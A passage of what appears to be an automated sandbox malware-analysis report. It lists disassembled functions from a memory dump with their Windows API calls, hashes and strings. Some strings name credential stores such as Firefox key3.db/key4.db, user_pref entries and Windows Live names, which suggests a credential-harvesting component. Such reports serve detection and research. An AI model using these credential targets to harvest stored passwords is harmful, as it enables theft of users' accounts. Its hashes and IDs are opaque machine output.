                                                                                                                                                                                                                      • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                                                    • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                    • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004036D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                      • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                      • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                                                    • API String ID: 500647785-4097000612
                                                                                                                                                                                                                    • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                    • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409213 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                                      • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                    • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                    • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405972 Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                                                      • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                                      • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                                      • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                                                                                    • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                    • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B0EB Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                                                    • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                    • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405BBD Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                    • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                    • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040690E Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 85stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                    • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                                    • API String ID: 581844971-2841947474
                                                                                                                                                                                                                    • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                    • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B86F Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                                                    • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                    • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407065 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                                                    • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                    • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004258DC Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 438COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                    • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                    • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D7EA Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                                                    • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                    • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004057FC Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                    • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A596 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                    • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                    • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408B27 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                                      • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                                    • strings, xrefs: 00408B98
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                    • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                    • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407E63 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                      • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                      • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                      • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7776E430,?), ref: 00407F2F
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                      • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
